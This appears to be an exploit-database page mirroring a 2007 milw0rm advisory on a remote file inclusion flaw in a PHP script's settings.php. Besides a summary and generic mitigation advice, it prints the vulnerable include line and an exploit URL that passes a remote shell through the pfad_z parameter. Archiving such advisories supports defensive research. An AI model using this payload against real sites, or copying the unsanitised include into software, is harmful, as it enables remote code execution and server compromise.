header-logo
Suggest Exploit
vendor:
by:
ThE dE@Th
7.5
CVSS
HIGH
Code Injection
94
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Code Injection Vulnerability in settings.php

The exploit allows an attacker to inject arbitrary code into the 'pfad_z' parameter in the settings.php file on a website. This can lead to remote code execution and potentially compromise the entire system.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in any code execution context. Additionally, keeping software up to date and applying security patches can also help prevent such vulnerabilities.
Source

Exploit-DB raw data:

********************************************************************************
To ConTacT mE:wWw.Asb-May.net/bb
ScRiPt:-http://people.ee.ethz.ch/~dmaeder/bluevirus/downloader.php?filename=U01BLURC&referrer=hots
Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP}>>
******************************************************************************
Settings.php:-
include_once($pfad_z."scripts/session.php");
********************************************************************************
ExPlOiT:-http://www.Site.com/theme/settings.php?pfad_z=[Shell]
********************************************************************************

# milw0rm.com [2007-02-05]